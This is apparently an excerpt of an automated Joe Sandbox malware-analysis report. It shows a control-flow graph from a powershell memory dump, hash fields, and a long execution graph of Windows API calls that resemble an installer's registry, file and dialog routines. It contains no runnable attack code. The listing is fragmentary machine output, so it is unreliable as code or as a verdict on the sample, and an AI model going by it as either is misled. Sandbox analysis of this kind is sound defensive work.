                                                          control_flow_graph 109 7fe89a70ed9-7fe89a70f96 110 7fe89a71098-7fe89a710c8 109->110 111 7fe89a70f9c-7fe89a70fa6 109->111 119 7fe89a710ca-7fe89a710dc 110->119 120 7fe89a710e0-7fe89a710eb 110->120 112 7fe89a70fa8-7fe89a70fb5 111->112 113 7fe89a70fbf-7fe89a70fee 111->113 112->113 114 7fe89a70fb7-7fe89a70fbd 112->114 113->110 126 7fe89a70ff4-7fe89a70ffe 113->126 114->113 121 7fe89a710ed-7fe89a71124 119->121 122 7fe89a710de 119->122 120->121 124 7fe89a7112a-7fe89a7119e 121->124 125 7fe89a711c1-7fe89a711cb 121->125 122->120 144 7fe89a711a6-7fe89a711be 124->144 127 7fe89a711d8-7fe89a711e8 125->127 128 7fe89a711cd-7fe89a711d7 125->128 129 7fe89a71017-7fe89a71077 126->129 130 7fe89a71000-7fe89a7100d 126->130 132 7fe89a711ea-7fe89a711ee 127->132 133 7fe89a711f5-7fe89a7121a 127->133 140 7fe89a71079-7fe89a71084 129->140 141 7fe89a7108b-7fe89a71097 129->141 130->129 131 7fe89a7100f-7fe89a71015 130->131 131->129 132->133 140->141 144->125
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.456945920.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7fe89a70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2dd6359cc84ab2fb26dfd9e2c8629b63da445b4d4a4deddc0093c2e264bcc407
                                                          • Instruction ID: 4970aeafd667fbb06b982e4fe4dcf25db61e26c761c8cee71887a5bf0737e8a9
                                                          • Opcode Fuzzy Hash: 2dd6359cc84ab2fb26dfd9e2c8629b63da445b4d4a4deddc0093c2e264bcc407
                                                          • Instruction Fuzzy Hash: 65B1E121A0EBC90FD347973858646A47FE1EF47254B2A01EBD4CDCB1B3DA189D5AC362

                                                          Execution Graph

                                                          Execution Coverage:23.6%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:21.3%
                                                          Total number of Nodes:1274
                                                          Total number of Limit Nodes:31
                                                          execution_graph 3590 402340 3591 402acb 17 API calls 3590->3591 3592 402351 3591->3592 3593 402acb 17 API calls 3592->3593 3594 40235a 3593->3594 3595 402acb 17 API calls 3594->3595 3596 402364 GetPrivateProfileStringA 3595->3596 3597 401d41 GetDlgItem GetClientRect 3598 402acb 17 API calls 3597->3598 3599 401d71 LoadImageA SendMessageA 3598->3599 3600 402957 3599->3600 3601 401d8f DeleteObject 3599->3601 3601->3600 3602 404a44 GetDlgItem GetDlgItem 3603 404a96 7 API calls 3602->3603 3617 404cae 3602->3617 3604 404b39 DeleteObject 3603->3604 3605 404b2c SendMessageA 3603->3605 3606 404b42 3604->3606 3605->3604 3608 404b79 3606->3608 3610 405fc2 17 API calls 3606->3610 3607 404d92 3609 404e3e 3607->3609 3613 404ca1 3607->3613 3619 404deb SendMessageA 3607->3619 3611 40403f 18 API calls 3608->3611 3614 404e50 3609->3614 3615 404e48 SendMessageA 3609->3615 3616 404b5b SendMessageA SendMessageA 3610->3616 3612 404b8d 3611->3612 3618 40403f 18 API calls 3612->3618 3620 4040a6 8 API calls 3613->3620 3626 404e62 ImageList_Destroy 3614->3626 3627 404e69 3614->3627 3631 404e79 3614->3631 3615->3614 3616->3606 3617->3607 3634 404d1f 3617->3634 3655 404992 SendMessageA 3617->3655 3635 404b9b 3618->3635 3619->3613 3624 404e00 SendMessageA 3619->3624 3625 405034 3620->3625 3621 404d84 SendMessageA 3621->3607 3623 404fe8 3623->3613 3632 404ffa ShowWindow GetDlgItem ShowWindow 3623->3632 3630 404e13 3624->3630 3626->3627 3628 404e72 GlobalFree 3627->3628 3627->3631 3628->3631 3629 404c6f GetWindowLongA SetWindowLongA 3633 404c88 3629->3633 3640 404e24 SendMessageA 3630->3640 3631->3623 3647 404eb4 3631->3647 3660 404a12 3631->3660 3632->3613 3636 404ca6 3633->3636 3637 404c8e ShowWindow 3633->3637 3634->3607 3634->3621 3635->3629 3639 404bea SendMessageA 3635->3639 3641 404c69 3635->3641 3644 404c26 SendMessageA 3635->3644 3645 404c37 SendMessageA 3635->3645 3654 404074 SendMessageA 3636->3654 3653 404074 SendMessageA 3637->3653 3639->3635 3640->3609 3641->3629 3641->3633 3642 404ef8 3648 404fbe InvalidateRect 3642->3648 3652 404f6c SendMessageA SendMessageA 3642->3652 3644->3635 3645->3635 3647->3642 3649 404ee2 SendMessageA 3647->3649 3648->3623 3650 404fd4 3648->3650 3649->3642 3669 40494d 3650->3669 3652->3642 3653->3613 3654->3617 3656 4049f1 SendMessageA 3655->3656 3657 4049b5 GetMessagePos ScreenToClient SendMessageA 3655->3657 3658 4049e9 3656->3658 3657->3658 3659 4049ee 3657->3659 3658->3634 3659->3656 3672 405fa0 lstrcpynA 3660->3672 3662 404a25 3673 405efe wsprintfA 3662->3673 3664 404a2f 3665 40140b 2 API calls 3664->3665 3666 404a38 3665->3666 3674 405fa0 lstrcpynA 3666->3674 3668 404a3f 3668->3647 3675 404888 3669->3675 3671 404962 3671->3623 3672->3662 3673->3664 3674->3668 3676 40489e 3675->3676 3677 405fc2 17 API calls 3676->3677 3678 404902 3677->3678 3679 405fc2 17 API calls 3678->3679 3680 40490d 3679->3680 3681 405fc2 17 API calls 3680->3681 3682 404923 lstrlenA wsprintfA SetDlgItemTextA 3681->3682 3682->3671 3683 401746 3684 402acb 17 API calls 3683->3684 3685 40174d 3684->3685 3686 405b68 2 API calls 3685->3686 3687 401754 3686->3687 3687->3687 3688 401947 3689 402acb 17 API calls 3688->3689 3690 40194e lstrlenA 3689->3690 3691 40257d 3690->3691 3695 4025ca 3696 402aa9 17 API calls 3695->3696 3702 4025d4 3696->3702 3697 402642 3698 405bb1 ReadFile 3698->3702 3699 402644 3704 405efe wsprintfA 3699->3704 3701 402654 3701->3697 3703 40266a SetFilePointer 3701->3703 3702->3697 3702->3698 3702->3699 3702->3701 3703->3697 3704->3697 3705 40224b 3706 402acb 17 API calls 3705->3706 3707 402251 3706->3707 3708 402acb 17 API calls 3707->3708 3709 40225a 3708->3709 3710 402acb 17 API calls 3709->3710 3711 402263 3710->3711 3712 4062a3 2 API calls 3711->3712 3713 40226c 3712->3713 3714 402270 3713->3714 3715 40227d lstrlenA lstrlenA 3713->3715 3716 4050c7 24 API calls 3714->3716 3717 4050c7 24 API calls 3715->3717 3719 402278 3716->3719 3718 4022b9 SHFileOperationA 3717->3718 3718->3714 3718->3719 3720 4028cb 3721 402aa9 17 API calls 3720->3721 3722 4028d1 3721->3722 3723 402906 3722->3723 3724 40271c 3722->3724 3726 4028e3 3722->3726 3723->3724 3725 405fc2 17 API calls 3723->3725 3725->3724 3726->3724 3728 405efe wsprintfA 3726->3728 3728->3724 3729 4022cd 3730 4022d4 3729->3730 3734 4022e7 3729->3734 3731 405fc2 17 API calls 3730->3731 3732 4022e1 3731->3732 3733 4056bc MessageBoxIndirectA 3732->3733 3733->3734 3735 4044d1 3736 4044fd 3735->3736 3737 40450e 3735->3737 3796 4056a0 GetDlgItemTextA 3736->3796 3739 40451a GetDlgItem 3737->3739 3743 404579 3737->3743 3742 40452e 3739->3742 3740 40465d 3794 404807 3740->3794 3798 4056a0 GetDlgItemTextA 3740->3798 3741 404508 3744 40620a 5 API calls 3741->3744 3745 404542 SetWindowTextA 3742->3745 3747 4059d1 4 API calls 3742->3747 3743->3740 3749 405fc2 17 API calls 3743->3749 3743->3794 3744->3737 3748 40403f 18 API calls 3745->3748 3753 404538 3747->3753 3754 40455e 3748->3754 3755 4045ed SHBrowseForFolderA 3749->3755 3750 40468d 3756 405a26 18 API calls 3750->3756 3751 4040a6 8 API calls 3752 40481b 3751->3752 3753->3745 3760 405938 3 API calls 3753->3760 3757 40403f 18 API calls 3754->3757 3755->3740 3758 404605 CoTaskMemFree 3755->3758 3759 404693 3756->3759 3761 40456c 3757->3761 3762 405938 3 API calls 3758->3762 3799 405fa0 lstrcpynA 3759->3799 3760->3745 3797 404074 SendMessageA 3761->3797 3764 404612 3762->3764 3767 404649 SetDlgItemTextA 3764->3767 3771 405fc2 17 API calls 3764->3771 3766 404572 3769 406338 5 API calls 3766->3769 3767->3740 3768 4046aa 3770 406338 5 API calls 3768->3770 3769->3743 3777 4046b1 3770->3777 3772 404631 lstrcmpiA 3771->3772 3772->3767 3775 404642 lstrcatA 3772->3775 3773 4046ed 3800 405fa0 lstrcpynA 3773->3800 3775->3767 3776 4046f4 3778 4059d1 4 API calls 3776->3778 3777->3773 3781 40597f 2 API calls 3777->3781 3783 404745 3777->3783 3779 4046fa GetDiskFreeSpaceA 3778->3779 3782 40471e MulDiv 3779->3782 3779->3783 3781->3777 3782->3783 3784 4047b6 3783->3784 3786 40494d 20 API calls 3783->3786 3785 4047d9 3784->3785 3787 40140b 2 API calls 3784->3787 3801 404061 KiUserCallbackDispatcher 3785->3801 3788 4047a3 3786->3788 3787->3785 3790 4047b8 SetDlgItemTextA 3788->3790 3791 4047a8 3788->3791 3790->3784 3793 404888 20 API calls 3791->3793 3792 4047f5 3792->3794 3802 40442a 3792->3802 3793->3784 3794->3751 3796->3741 3797->3766 3798->3750 3799->3768 3800->3776 3801->3792 3803 404438 3802->3803 3804 40443d SendMessageA 3802->3804 3803->3804 3804->3794 3805 4020d1 3806 402acb 17 API calls 3805->3806 3807 4020d8 3806->3807 3808 402acb 17 API calls 3807->3808 3809 4020e2 3808->3809 3810 402acb 17 API calls 3809->3810 3811 4020ec 3810->3811 3812 402acb 17 API calls 3811->3812 3813 4020f6 3812->3813 3814 402acb 17 API calls 3813->3814 3815 402100 3814->3815 3816 402142 CoCreateInstance 3815->3816 3817 402acb 17 API calls 3815->3817 3820 402161 3816->3820 3822 40220c 3816->3822 3817->3816 3818 401423 24 API calls 3819 402242 3818->3819 3821 4021ec MultiByteToWideChar 3820->3821 3820->3822 3821->3822 3822->3818 3822->3819 3823 4026d4 3824 4026da 3823->3824 3825 4026de FindNextFileA 3824->3825 3828 4026f0 3824->3828 3826 40272f 3825->3826 3825->3828 3829 405fa0 lstrcpynA 3826->3829 3829->3828 3000 4023d6 3001 402acb 17 API calls 3000->3001 3002 4023e8 3001->3002 3003 402acb 17 API calls 3002->3003 3004 4023f2 3003->3004 3017 402b5b 3004->3017 3007 402427 3009 402433 3007->3009 3012 402aa9 17 API calls 3007->3012 3008 402acb 17 API calls 3011 402420 lstrlenA 3008->3011 3013 402452 RegSetValueExA 3009->3013 3021 402f9c 3009->3021 3010 40271c 3011->3007 3012->3009 3015 402468 RegCloseKey 3013->3015 3015->3010 3018 402b76 3017->3018 3041 405e54 3018->3041 3023 402fb2 3021->3023 3022 402fe0 3045 4031ae 3022->3045 3023->3022 3050 4031c4 SetFilePointer 3023->3050 3027 403147 3030 403189 3027->3030 3033 40314b 3027->3033 3028 402ffd GetTickCount 3029 403131 3028->3029 3037 40304c 3028->3037 3029->3013 3032 4031ae ReadFile 3030->3032 3031 4031ae ReadFile 3031->3037 3032->3029 3033->3029 3034 4031ae ReadFile 3033->3034 3035 405be0 WriteFile 3033->3035 3034->3033 3035->3033 3036 4030a2 GetTickCount 3036->3037 3037->3029 3037->3031 3037->3036 3038 4030c7 MulDiv wsprintfA 3037->3038 3048 405be0 WriteFile 3037->3048 3039 4050c7 24 API calls 3038->3039 3039->3037 3042 405e63 3041->3042 3043 402402 3042->3043 3044 405e6e RegCreateKeyExA 3042->3044 3043->3007 3043->3008 3043->3010 3044->3043 3051 405bb1 ReadFile 3045->3051 3049 405bfe 3048->3049 3049->3037 3050->3022 3052 402feb 3051->3052 3052->3027 3052->3028 3052->3029 3830 4014d6 3831 402aa9 17 API calls 3830->3831 3832 4014dc Sleep 3831->3832 3834 402957 3832->3834 3053 401759 3054 402acb 17 API calls 3053->3054 3055 401760 3054->3055 3056 401786 3055->3056 3057 40177e 3055->3057 3096 405fa0 lstrcpynA 3056->3096 3095 405fa0 lstrcpynA 3057->3095 3060 401784 3063 40620a 5 API calls 3060->3063 3061 401791 3097 405938 lstrlenA CharPrevA 3061->3097 3069 4017a3 3063->3069 3068 4017ba CompareFileTime 3068->3069 3069->3068 3070 40187e 3069->3070 3075 405fa0 lstrcpynA 3069->3075 3078 405fc2 17 API calls 3069->3078 3090 401855 3069->3090 3091 405b14 GetFileAttributesA 3069->3091 3094 405b39 GetFileAttributesA CreateFileA 3069->3094 3100 4062a3 FindFirstFileA 3069->3100 3103 4056bc 3069->3103 3071 4050c7 24 API calls 3070->3071 3072 401888 3071->3072 3074 402f9c 31 API calls 3072->3074 3073 4050c7 24 API calls 3081 40186a 3073->3081 3076 40189b 3074->3076 3075->3069 3077 4018af SetFileTime 3076->3077 3079 4018c1 CloseHandle 3076->3079 3077->3079 3078->3069 3080 4018d2 3079->3080 3079->3081 3082 4018d7 3080->3082 3083 4018ea 3080->3083 3084 405fc2 17 API calls 3082->3084 3085 405fc2 17 API calls 3083->3085 3088 4018df lstrcatA 3084->3088 3086 4018f2 3085->3086 3089 4056bc MessageBoxIndirectA 3086->3089 3088->3086 3089->3081 3090->3073 3090->3081 3092 405b33 3091->3092 3093 405b26 SetFileAttributesA 3091->3093 3092->3069 3093->3092 3094->3069 3095->3060 3096->3061 3098 405952 lstrcatA 3097->3098 3099 401797 lstrcatA 3097->3099 3098->3099 3099->3060 3101 4062c4 3100->3101 3102 4062b9 FindClose 3100->3102 3101->3069 3102->3101 3106 4056d1 3103->3106 3104 40571d 3104->3069 3105 4056e5 MessageBoxIndirectA 3105->3104 3106->3104 3106->3105 3835 401659 3836 402acb 17 API calls 3835->3836 3837 40165f 3836->3837 3838 4062a3 2 API calls 3837->3838 3839 401665 3838->3839 3840 401959 3841 402aa9 17 API calls 3840->3841 3842 401960 3841->3842 3843 402aa9 17 API calls 3842->3843 3844 40196d 3843->3844 3845 402acb 17 API calls 3844->3845 3846 401984 lstrlenA 3845->3846 3848 401994 3846->3848 3847 4019d4 3848->3847 3852 405fa0 lstrcpynA 3848->3852 3850 4019c4 3850->3847 3851 4019c9 lstrlenA 3850->3851 3851->3847 3852->3850 3853 401cda 3854 402aa9 17 API calls 3853->3854 3855 401ce0 IsWindow 3854->3855 3856 401a0e 3855->3856 3857 401a5e 3858 402aa9 17 API calls 3857->3858 3859 401a67 3858->3859 3860 402aa9 17 API calls 3859->3860 3861 401a0e 3860->3861 3862 401f61 3863 402acb 17 API calls 3862->3863 3864 401f68 3863->3864 3865 406338 5 API calls 3864->3865 3866 401f77 3865->3866 3867 401f8f GlobalAlloc 3866->3867 3876 401ff7 3866->3876 3868 401fa3 3867->3868 3867->3876 3869 406338 5 API calls 3868->3869 3870 401faa 3869->3870 3871 406338 5 API calls 3870->3871 3872 401fb4 3871->3872 3872->3876 3877 405efe wsprintfA 3872->3877 3874 401feb 3878 405efe wsprintfA 3874->3878 3877->3874 3878->3876 3879 402561 3880 402acb 17 API calls 3879->3880 3881 402568 3880->3881 3884 405b39 GetFileAttributesA CreateFileA 3881->3884 3883 402574 3884->3883 3885 401563 3886 4028ff 3885->3886 3889 405efe wsprintfA 3886->3889 3888 402904 3889->3888 3890 401b63 3891 401b70 3890->3891 3892 401bb4 3890->3892 3895 4022d4 3891->3895 3900 401b87 3891->3900 3893 401bb8 3892->3893 3894 401bdd GlobalAlloc 3892->3894 3903 401bf8 3893->3903 3911 405fa0 lstrcpynA 3893->3911 3896 405fc2 17 API calls 3894->3896 3897 405fc2 17 API calls 3895->3897 3896->3903 3899 4022e1 3897->3899 3904 4056bc MessageBoxIndirectA 3899->3904 3909 405fa0 lstrcpynA 3900->3909 3901 401bca GlobalFree 3901->3903 3904->3903 3905 401b96 3910 405fa0 lstrcpynA 3905->3910 3907 401ba5 3912 405fa0 lstrcpynA 3907->3912 3909->3905 3910->3907 3911->3901 3912->3903 2892 4024e5 2893 402b0b 17 API calls 2892->2893 2894 4024ef 2893->2894 2904 402aa9 2894->2904 2896 4024f8 2897 402506 2896->2897 2898 40271c 2896->2898 2899 402513 RegEnumKeyA 2897->2899 2900 40251f RegEnumValueA 2897->2900 2901 40253b RegCloseKey 2899->2901 2900->2901 2902 402534 2900->2902 2901->2898 2902->2901 2905 405fc2 17 API calls 2904->2905 2906 402abe 2905->2906 2906->2896 3913 40166a 3914 402acb 17 API calls 3913->3914 3915 401671 3914->3915 3916 402acb 17 API calls 3915->3916 3917 40167a 3916->3917 3918 402acb 17 API calls 3917->3918 3919 401683 MoveFileA 3918->3919 3920 401696 3919->3920 3921 40168f 3919->3921 3923 4062a3 2 API calls 3920->3923 3925 402242 3920->3925 3922 401423 24 API calls 3921->3922 3922->3925 3924 4016a5 3923->3924 3924->3925 3926 405d7f 36 API calls 3924->3926 3926->3921 3107 403b6b 3108 403b83 3107->3108 3109 403cbe 3107->3109 3108->3109 3110 403b8f 3108->3110 3111 403d0f 3109->3111 3112 403ccf GetDlgItem GetDlgItem 3109->3112 3113 403b9a SetWindowPos 3110->3113 3114 403bad 3110->3114 3116 403d69 3111->3116 3121 401389 2 API calls 3111->3121 3115 40403f 18 API calls 3112->3115 3113->3114 3118 403bb2 ShowWindow 3114->3118 3119 403bca 3114->3119 3120 403cf9 SetClassLongA 3115->3120 3117 40408b SendMessageA 3116->3117 3122 403cb9 3116->3122 3148 403d7b 3117->3148 3118->3119 3123 403bd2 DestroyWindow 3119->3123 3124 403bec 3119->3124 3125 40140b 2 API calls 3120->3125 3126 403d41 3121->3126 3127 403fc8 3123->3127 3128 403bf1 SetWindowLongA 3124->3128 3129 403c02 3124->3129 3125->3111 3126->3116 3130 403d45 SendMessageA 3126->3130 3127->3122 3138 403ff9 ShowWindow 3127->3138 3128->3122 3133 403cab 3129->3133 3134 403c0e GetDlgItem 3129->3134 3130->3122 3131 40140b 2 API calls 3131->3148 3132 403fca DestroyWindow EndDialog 3132->3127 3137 4040a6 8 API calls 3133->3137 3135 403c21 SendMessageA IsWindowEnabled 3134->3135 3136 403c3e 3134->3136 3135->3122 3135->3136 3140 403c4b 3136->3140 3141 403c92 SendMessageA 3136->3141 3142 403c5e 3136->3142 3152 403c43 3136->3152 3137->3122 3138->3122 3139 405fc2 17 API calls 3139->3148 3140->3141 3140->3152 3141->3133 3145 403c66 3142->3145 3146 403c7b 3142->3146 3143 404018 SendMessageA 3147 403c79 3143->3147 3144 40403f 18 API calls 3144->3148 3184 40140b 3145->3184 3149 40140b 2 API calls 3146->3149 3147->3133 3148->3122 3148->3131 3148->3132 3148->3139 3148->3144 3153 40403f 18 API calls 3148->3153 3169 403f0a DestroyWindow 3148->3169 3151 403c82 3149->3151 3151->3133 3151->3152 3152->3143 3154 403df6 GetDlgItem 3153->3154 3155 403e13 ShowWindow KiUserCallbackDispatcher 3154->3155 3156 403e0b 3154->3156 3178 404061 KiUserCallbackDispatcher 3155->3178 3156->3155 3158 403e3d EnableWindow 3163 403e51 3158->3163 3159 403e56 GetSystemMenu EnableMenuItem SendMessageA 3160 403e86 SendMessageA 3159->3160 3159->3163 3160->3163 3163->3159 3179 404074 SendMessageA 3163->3179 3180 403b4c 3163->3180 3183 405fa0 lstrcpynA 3163->3183 3165 403eb5 lstrlenA 3166 405fc2 17 API calls 3165->3166 3167 403ec6 SetWindowTextA 3166->3167 3168 401389 2 API calls 3167->3168 3168->3148 3169->3127 3170 403f24 CreateDialogParamA 3169->3170 3170->3127 3171 403f57 3170->3171 3172 40403f 18 API calls 3171->3172 3173 403f62 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3172->3173 3174 401389 2 API calls 3173->3174 3175 403fa8 3174->3175 3175->3122 3176 403fb0 ShowWindow 3175->3176 3177 40408b SendMessageA 3176->3177 3177->3127 3178->3158 3179->3163 3181 405fc2 17 API calls 3180->3181 3182 403b5a SetWindowTextA 3181->3182 3182->3163 3183->3165 3185 401389 2 API calls 3184->3185 3186 401420 3185->3186 3186->3152 3927 4019ed 3928 402acb 17 API calls 3927->3928 3929 4019f4 3928->3929 3930 402acb 17 API calls 3929->3930 3931 4019fd 3930->3931 3932 401a04 lstrcmpiA 3931->3932 3933 401a16 lstrcmpA 3931->3933 3934 401a0a 3932->3934 3933->3934 3935 40156f 3936 401586 3935->3936 3937 40157f ShowWindow 3935->3937 3938 401594 ShowWindow 3936->3938 3939 402957 3936->3939 3937->3936 3938->3939 3940 402473 3941 402b0b 17 API calls 3940->3941 3942 40247d 3941->3942 3943 402acb 17 API calls 3942->3943 3944 402486 3943->3944 3945 402490 RegQueryValueExA 3944->3945 3950 40271c 3944->3950 3946 4024b0 3945->3946 3947 4024b6 RegCloseKey 3945->3947 3946->3947 3951 405efe wsprintfA 3946->3951 3947->3950 3951->3947 3952 4014f4 SetForegroundWindow 3953 402957 3952->3953 3954 404175 lstrcpynA lstrlenA 3955 401cfb 3956 402aa9 17 API calls 3955->3956 3957 401d02 3956->3957 3958 402aa9 17 API calls 3957->3958 3959 401d0e GetDlgItem 3958->3959 3960 40257d 3959->3960 3236 4022fc 3237 402304 3236->3237 3238 40230a 3236->3238 3239 402acb 17 API calls 3237->3239 3240 40231a 3238->3240 3241 402acb 17 API calls 3238->3241 3239->3238 3242 402acb 17 API calls 3240->3242 3245 402328 3240->3245 3241->3240 3242->3245 3243 402acb 17 API calls 3244 402331 WritePrivateProfileStringA 3243->3244 3245->3243 3961 402c7c 3962 402c8b SetTimer 3961->3962 3964 402ca4 3961->3964 3962->3964 3963 402cf9 3964->3963 3965 402cbe MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3964->3965 3965->3963 3966 4018fd 3967 401934 3966->3967 3968 402acb 17 API calls 3967->3968 3969 401939 3968->3969 3970 405768 67 API calls 3969->3970 3971 401942 3970->3971 3972 4026fe 3973 402acb 17 API calls 3972->3973 3974 402705 FindFirstFileA 3973->3974 3975 402728 3974->3975 3979 402718 3974->3979 3976 40272f 3975->3976 3980 405efe wsprintfA 3975->3980 3981 405fa0 lstrcpynA 3976->3981 3980->3976 3981->3979 3982 401000 3983 401037 BeginPaint GetClientRect 3982->3983 3984 40100c DefWindowProcA 3982->3984 3986 4010f3 3983->3986 3987 401179 3984->3987 3988 401073 CreateBrushIndirect FillRect DeleteObject 3986->3988 3989 4010fc 3986->3989 3988->3986 3990 401102 CreateFontIndirectA 3989->3990 3991 401167 EndPaint 3989->3991 3990->3991 3992 401112 6 API calls 3990->3992 3991->3987 3992->3991 3993 401900 3994 402acb 17 API calls 3993->3994 3995 401907 3994->3995 3996 4056bc MessageBoxIndirectA 3995->3996 3997 401910 3996->3997 2801 402381 2802 4023b3 2801->2802 2803 402388 2801->2803 2818 402acb 2802->2818 2813 402b0b 2803->2813 2809 402399 2811 402acb 17 API calls 2809->2811 2810 4023c7 2812 4023a0 RegDeleteValueA RegCloseKey 2811->2812 2812->2810 2814 402acb 17 API calls 2813->2814 2815 402b22 2814->2815 2828 405e26 2815->2828 2819 402ad7 2818->2819 2832 405fc2 2819->2832 2822 4023ba 2824 402b89 2822->2824 2825 402b95 2824->2825 2826 402b9c 2824->2826 2825->2810 2826->2825 2870 402bcd 2826->2870 2829 405e35 2828->2829 2830 40238f 2829->2830 2831 405e3e RegOpenKeyExA 2829->2831 2830->2809 2830->2810 2831->2830 2844 405fcf 2832->2844 2833 4061f1 2834 402af8 2833->2834 2865 405fa0 lstrcpynA 2833->2865 2834->2822 2849 40620a 2834->2849 2836 4061cb lstrlenA 2836->2844 2839 405fc2 10 API calls 2839->2836 2840 4060e7 GetSystemDirectoryA 2840->2844 2842 4060fa GetWindowsDirectoryA 2842->2844 2843 40620a 5 API calls 2843->2844 2844->2833 2844->2836 2844->2839 2844->2840 2844->2842 2844->2843 2845 40612e SHGetSpecialFolderLocation 2844->2845 2846 405fc2 10 API calls 2844->2846 2847 406174 lstrcatA 2844->2847 2858 405e87 2844->2858 2863 405efe wsprintfA 2844->2863 2864 405fa0 lstrcpynA 2844->2864 2845->2844 2848 406146 SHGetPathFromIDListA CoTaskMemFree 2845->2848 2846->2844 2847->2844 2848->2844 2855 406216 2849->2855 2850 40627e 2851 406282 CharPrevA 2850->2851 2854 40629d 2850->2854 2851->2850 2852 406273 CharNextA 2852->2850 2852->2855 2854->2822 2855->2850 2855->2852 2856 406261 CharNextA 2855->2856 2857 40626e CharNextA 2855->2857 2866 405963 2855->2866 2856->2855 2857->2852 2859 405e26 RegOpenKeyExA 2858->2859 2860 405eb4 2859->2860 2861 405ebb RegQueryValueExA RegCloseKey 2860->2861 2862 405eea 2860->2862 2861->2862 2862->2844 2863->2844 2864->2844 2865->2834 2867 405969 2866->2867 2868 40597c 2867->2868 2869 40596f CharNextA 2867->2869 2868->2855 2869->2867 2871 405e26 RegOpenKeyExA 2870->2871 2872 402bfb 2871->2872 2873 402c75 2872->2873 2874 402bff 2872->2874 2873->2825 2875 402c21 RegEnumKeyA 2874->2875 2876 402c38 RegCloseKey 2874->2876 2878 402c59 RegCloseKey 2874->2878 2880 402bcd 6 API calls 2874->2880 2875->2874 2875->2876 2883 406338 GetModuleHandleA 2876->2883 2878->2873 2880->2874 2881 402c69 RegDeleteKeyA 2881->2873 2882 402c4c 2882->2873 2884 406354 2883->2884 2885 40635e GetProcAddress 2883->2885 2889 4062ca GetSystemDirectoryA 2884->2889 2887 402c48 2885->2887 2887->2881 2887->2882 2888 40635a 2888->2885 2888->2887 2890 4062ec wsprintfA LoadLibraryExA 2889->2890 2890->2888 3998 401502 3999 40150a 3998->3999 4001 40151d 3998->4001 4000 402aa9 17 API calls 3999->4000 4000->4001 4002 402003 4003 402015 4002->4003 4004 4020c3 4002->4004 4005 402acb 17 API calls 4003->4005 4006 401423 24 API calls 4004->4006 4007 40201c 4005->4007 4013 402242 4006->4013 4008 402acb 17 API calls 4007->4008 4009 402025 4008->4009 4010 40203a LoadLibraryExA 4009->4010 4011 40202d GetModuleHandleA 4009->4011 4010->4004 4012 40204a GetProcAddress 4010->4012 4011->4010 4011->4012 4014 402096 4012->4014 4015 402059 4012->4015 4016 4050c7 24 API calls 4014->4016 4017 401423 24 API calls 4015->4017 4018 402069 4015->4018 4016->4018 4017->4018 4018->4013 4019 4020b7 FreeLibrary 4018->4019 4019->4013 4020 402583 4021 402588 4020->4021 4022 40259c 4020->4022 4023 402aa9 17 API calls 4021->4023 4024 402acb 17 API calls 4022->4024 4026 402591 4023->4026 4025 4025a3 lstrlenA 4024->4025 4025->4026 4027 405be0 WriteFile 4026->4027 4028 4025c5 4026->4028 4027->4028 2907 405205 2908 4053b0 2907->2908 2909 405227 GetDlgItem GetDlgItem GetDlgItem 2907->2909 2910 4053e0 2908->2910 2911 4053b8 GetDlgItem CreateThread CloseHandle 2908->2911 2952 404074 SendMessageA 2909->2952 2914 40540e 2910->2914 2915 4053f6 ShowWindow ShowWindow 2910->2915 2916 40542f 2910->2916 2911->2910 2986 405199 OleInitialize 2911->2986 2913 405297 2918 40529e GetClientRect GetSystemMetrics SendMessageA SendMessageA 2913->2918 2917 405469 2914->2917 2920 405442 ShowWindow 2914->2920 2921 40541e 2914->2921 2957 404074 SendMessageA 2915->2957 2961 4040a6 2916->2961 2917->2916 2925 405476 SendMessageA 2917->2925 2923 4052f0 SendMessageA SendMessageA 2918->2923 2924 40530c 2918->2924 2928 405462 2920->2928 2929 405454 2920->2929 2958 404018 2921->2958 2923->2924 2931 405311 SendMessageA 2924->2931 2932 40531f 2924->2932 2927 40543b 2925->2927 2933 40548f CreatePopupMenu 2925->2933 2930 404018 SendMessageA 2928->2930 2975 4050c7 2929->2975 2930->2917 2931->2932 2953 40403f 2932->2953 2935 405fc2 17 API calls 2933->2935 2937 40549f AppendMenuA 2935->2937 2939 4054d0 TrackPopupMenu 2937->2939 2940 4054bd GetWindowRect 2937->2940 2938 40532f 2941 405338 ShowWindow 2938->2941 2942 40536c GetDlgItem SendMessageA 2938->2942 2939->2927 2943 4054ec 2939->2943 2940->2939 2944 40535b 2941->2944 2945 40534e ShowWindow 2941->2945 2942->2927 2946 405393 SendMessageA SendMessageA 2942->2946 2947 40550b SendMessageA 2943->2947 2956 404074 SendMessageA 2944->2956 2945->2944 2946->2927 2947->2947 2948 405528 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 2947->2948 2950 40554a SendMessageA 2948->2950 2950->2950 2951 40556c GlobalUnlock SetClipboardData CloseClipboard 2950->2951 2951->2927 2952->2913 2954 405fc2 17 API calls 2953->2954 2955 40404a SetDlgItemTextA 2954->2955 2955->2938 2956->2942 2957->2914 2959 404025 SendMessageA 2958->2959 2960 40401f 2958->2960 2959->2916 2960->2959 2962 404169 2961->2962 2963 4040be GetWindowLongA 2961->2963 2962->2927 2963->2962 2964 4040d3 2963->2964 2964->2962 2965 404100 GetSysColor 2964->2965 2966 404103 2964->2966 2965->2966 2967 404113 SetBkMode 2966->2967 2968 404109 SetTextColor 2966->2968 2969 404131 2967->2969 2970 40412b GetSysColor 2967->2970 2968->2967 2971 404138 SetBkColor 2969->2971 2972 404142 2969->2972 2970->2969 2971->2972 2972->2962 2973 404155 DeleteObject 2972->2973 2974 40415c CreateBrushIndirect 2972->2974 2973->2974 2974->2962 2976 4050e2 2975->2976 2985 405185 2975->2985 2977 4050ff lstrlenA 2976->2977 2978 405fc2 17 API calls 2976->2978 2979 405128 2977->2979 2980 40510d lstrlenA 2977->2980 2978->2977 2981 40513b 2979->2981 2982 40512e SetWindowTextA 2979->2982 2983 40511f lstrcatA 2980->2983 2980->2985 2984 405141 SendMessageA SendMessageA SendMessageA 2981->2984 2981->2985 2982->2981 2983->2979 2984->2985 2985->2928 2993 40408b 2986->2993 2988 4051bc 2992 4051e3 2988->2992 2996 401389 